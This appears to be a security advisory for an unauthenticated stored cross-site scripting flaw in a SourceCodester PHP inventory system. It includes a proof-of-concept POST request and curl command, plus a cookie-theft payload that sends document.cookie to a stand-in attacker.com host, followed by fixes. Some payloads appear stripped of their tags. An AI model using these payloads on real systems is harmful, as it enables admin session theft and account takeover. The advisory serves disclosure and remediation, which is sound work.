Share
## https://sploitus.com/exploit?id=F25EBE33-64F2-56B1-9C60-5B5A2FB4D486
# Stored XSS in Inventory System using PHP and MySQL

## Vulnerability Details

| Field | Details |
|---|---|
| **Vulnerability Type** | Stored Cross-Site Scripting (XSS) |
| **Affected Application** | Inventory System using PHP and MySQL |
| **Vendor** | SourceCodester |
| **Affected Version** | 1.0 |
| **Affected File** | `register.php` |
| **Parameters** | `fullname`, `username` |
| **Authentication Required** | No (Unauthenticated) |
| **Impact** | Admin session hijacking, malicious script execution in admin panel |
| **CVSS Score** | 8.8 (High) |
| **CVSS Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N |

---

## Description

The **Inventory System using PHP and MySQL** by SourceCodester (submitted May 23, 2026) is vulnerable to **Unauthenticated Stored Cross-Site Scripting (XSS)** in the Staff Registration module (`register.php`).

The `fullname` and `username` input fields fail to sanitize or encode user-supplied input before storing it in the database. When an administrator visits the **User Management** page (`users.php`), the unsanitized payloads are rendered directly in the HTML context, causing immediate JavaScript execution in the admin's browser session.

Because registration requires **no authentication**, a remote, unauthenticated attacker can inject arbitrary JavaScript that will execute in the context of any administrator who views the User Management panel.

---

## Attack Scenario

1. Attacker visits `/product_inventory/register.php` โ€” no login required.
2. Attacker submits a malicious payload in the `fullname` and/or `username` fields.
3. Payload is stored in the database without sanitization.
4. When the admin logs in and navigates to `/product_inventory/users.php`, the payload executes automatically in the admin's browser.
5. Attacker can steal the admin's session cookie, redirect the admin to a phishing page, or perform any action on behalf of the admin.

---

## Proof of Concept

### Step 1 โ€” Navigate to the Registration Page (No Auth Required)

```
http:///product_inventory/register.php
```

### Step 2 โ€” Submit the Following Registration Form

**Full Name field payload:**
```
alert(1)
```

**Username field payload:**
```
alert(2)
```

**Password:** any value (e.g., `test1234`)

### Step 3 โ€” HTTP Request (Burp Suite / curl)

```http
POST /product_inventory/register.php HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

fullname=alert(1)&username=alert(2)&password=test1234&submit=
```

**curl equivalent:**
```bash
curl -X POST "http:///product_inventory/register.php" \
  -d "fullname=alert(1)&username=alert(2)&password=test1234&submit="
```

### Step 4 โ€” Trigger as Admin

Log in as administrator and navigate to:
```
http:///product_inventory/users.php
```

Both payloads execute immediately upon page load.

---

## Impact

An unauthenticated attacker can:

- **Steal admin session cookies** โ€” escalating to full admin account takeover
- **Redirect admin to phishing pages**
- **Perform admin-level actions** silently via JavaScript (create/delete users, manipulate inventory)
- **Deploy a persistent keylogger** in the admin panel
- **Deface the admin interface**

Session cookie theft example payload (replace with attacker server):
```javascript
document.location='http://attacker.com/steal?c='+document.cookie
```

---

## Screenshots

### Step 1 โ€” Injecting Payloads in Registration Form



### Step 2 โ€” XSS Fires on Admin users.php



---

## Affected Code (Root Cause)

The vulnerability exists because `register.php` inserts user input directly into the database without sanitization, and `users.php` outputs the stored values without `htmlspecialchars()` encoding.

**Vulnerable pattern in `users.php` (approximate):**
```php
// Unsafe โ€” outputs raw database value directly into HTML
echo $row['fullname'];
echo $row['username'];
```

**Fix โ€” apply output encoding:**
```php
echo htmlspecialchars($row['fullname'], ENT_QUOTES, 'UTF-8');
echo htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8');
```

Additionally, input should be sanitized on insertion in `register.php` using `strip_tags()` or prepared statements with proper validation.

---

## Remediation

1. Encode all output using `htmlspecialchars()` with `ENT_QUOTES` before rendering user-supplied data in HTML.
2. Validate and sanitize all input fields on the server side at point of entry.
3. Implement a Content Security Policy (CSP) header to mitigate XSS impact.

---

## References

- [SourceCodester โ€” Inventory System using PHP and MySQL]([https://www.sourcecodester.com/php/inventory-system-using-php-and-mysql-source-code](https://www.sourcecodester.com/php/18722/php-inventory-system.html)


---

*Reported by Syed Imad Uddin Alvi โ€” Independent Security Researcher*